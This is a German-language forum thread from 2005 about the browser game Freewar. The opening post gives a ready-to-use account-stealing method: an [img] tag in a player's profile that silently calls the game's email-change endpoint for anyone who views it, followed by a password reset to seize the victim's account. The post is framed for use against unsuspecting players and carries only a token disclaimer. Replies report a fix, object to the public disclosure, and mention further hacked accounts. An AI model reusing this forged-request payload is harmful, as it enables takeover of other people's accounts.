Seite 1 von 2

HACKEN UND GEHACKT WERDEN! ACC-STEAL

Verfasst: 30. Jan 2005, 04:11
von XSS-Lover
Nur HEUTE! Nur HIER! EXKLUSIV!

Zeige ich euch wie man kinderleicht einen ACC stehlen kann.
Alles was man dafür braucht sind:
- eine eMail-Adresse
- ein Freewar-Account
- angeslossene, installierte und richtig funktionierende Geräte "Gehirn" und "Hände" 8)
- einen Noob, der kein ACC mehr braucht ;) :twisted:
Also. Ihr loggt euch wie gewöhnlich ein, geht in euren Profil
und drückt auf "Beschreibung - ändern".
Dann fügt ihr folgende Zeile ein:

[img]http://<SERVER-IP>/freewar/internal/profil.php?action=change_email2&email=<EURE%20EMAIL-ADRESSE>[/img]

wo <SERVER-IP> für den jeweiligen server steht (1 bis 4)
und <EMAIL-ADRESSE> auf die ihr später Tausende von gestohlenen Passwörtern
bekommen wollt.

Dann clickt ihr auf "Ändern" und Hop-La! Fertig! Easy, ne?
ok. Jetzt braucht ihr ne Opfer. Bittet jemanden euren Profil
anzusehen und seine eMail-Adresse wird AUTOMATISCH
geändert. Dann geht ihr auf die Freewar-Startseite, im
Login-Fenster clickt auf "Password vergessen?" und gibt den
Namen der Opfer ein! Ihr bekommt dann in wenigen sekunden einen
Link zugeschickt, wo man den Passwort der Opfer manuell ändern
kann. UND DAS OHNE DEN ALTEN ZU KENNEN!!!
Fertig! Jetzt habt ihr die volle Kontrolle über den Account.
(natürlich erst nachdem der wahre User sich ausgellogt hat,
denn sonst kann er die Adresse immernoch ändern)

Dieses Material wurde veröffentlich nur um es allen deutlich
zu machen wie teuer man manchmal für die Faulheit und
Unprofessionalität der MODs und ADMINs bezahlen muss. Denn sie
sind diejenige, die die Seite gründlich prüfen und ständig
warten sollen.

Es ist verboten diese Information für illigale Zwecke zu benutzen.
Während de kompletten Untersuchung und auch während der Testzeit
wurden von mir persönlich KEINE Accounts geklaut. Ich hatte
weder die Absicht Schaden egal welcher Art anzurichten, noch
einem bestimmten Benutzer sein Acc zu stehlen.

Ich danke allen für eure Aufmerksamkeit.

Gefunden und Beschrieben vom D@nte$
mailto:remote_commander@mail.ru
ICQ: 117472006

Verfasst: 30. Jan 2005, 04:22
von Sotrax
Wurde bereits gefixed. Alle Leute die derartiges dennoch versuchen müssen mit einem Ban rechnen.

Verfasst: 30. Jan 2005, 04:27
von XSS-Lover
Richtig, Sotrax, weiter so!
morgen werd ich die nächte schwache Stelle veröffentlichen :twisted: :) :lol:

Verfasst: 30. Jan 2005, 04:44
von Metzle
Geht das dann auch, wenn schon im Forum, dann nur in einem?

Verfasst: 30. Jan 2005, 04:50
von XSS-Lover
ich konnte mich nicht entscheiden
ausserdem als ich das gepostet habe war dir lücke noch offen und ich wollte, dass mods das sehen... und zwar die sollten es schnellen tun als die anderen es ausprobiert hätten ;)

übrigens, Sotrax... ich weiß nicht, was du wo geändert hast, aber ich kann mit diesem Bug immernoch eMails der anderen ändern! Gucks dir bitte etwas genauer an.

Verfasst: 30. Jan 2005, 05:55
von Sotrax
In welcher Welt soll der Bug noch bestehen? Hier scheint er nicht mehr aufzutreten.

Verfasst: 30. Jan 2005, 17:30
von Metzle
Oder noch ne andere Idee....wenn du schon so Bugs entdeckst, schreib sie doch direkt an den Support, ohne sie im Forum zu veröffentlichen, weil sonst viele dies auch ausprobieren, was sicher nicht schön ist ;)

Verfasst: 30. Jan 2005, 17:32
von Kai aus der Kiste
jo genau schreib sie doch direkt an sotrax dann isses besser

Verfasst: 30. Jan 2005, 19:22
von Poultrygeist
dieser post steht jetzt in 3 foren...muss das sein??

Verfasst: 30. Jan 2005, 19:24
von Kai aus der Kiste
ehrlich mal 3 foren is bissl sinnlos wenn dann in 4foren damits ne gerade zahl is

Verfasst: 30. Jan 2005, 19:34
von Metzle
Die einzig richtige Antwort ist und bleibt, 42 :P

Verfasst: 31. Jan 2005, 12:16
von huwar
Trotzdem finde ich es gut, das so eine Schwachstelle mal gepostet wird. (eine reicht aber auch...)
Damit geben vielleicht mal die Schreihälse Ruhe, die zu jeder 'Account gehackt' Meldung ihr "Selbst Schuld" posten.

Verfasst: 31. Jan 2005, 15:57
von Kai aus der Kiste
ne 59 is die universalantwort bzw aminosäuren stimmt au immer

Verfasst: 31. Jan 2005, 17:17
von Metzle
huwar hat geschrieben:Trotzdem finde ich es gut, das so eine Schwachstelle mal gepostet wird. (eine reicht aber auch...)
Damit geben vielleicht mal die Schreihälse Ruhe, die zu jeder 'Account gehackt' Meldung ihr "Selbst Schuld" posten.
Naja, in wievielen der Fälle ist man denn auch selbst schuld? Das Posten bringt in der Hinsicht nichts, dass die Leute es sofort austesten, ob es wirklich klappt. Gibt es bestimmt genug, die es probiert haben. Wenn man das diskret an Sotrax schreibt, dann tut es das doch.

doch nicht gefixed ??

Verfasst: 2. Feb 2005, 15:52
von nik68
hi,

anscheinend wurde es doch nciht gefixed - denn es gab' wieder gehackte accounts ...

gruß nik68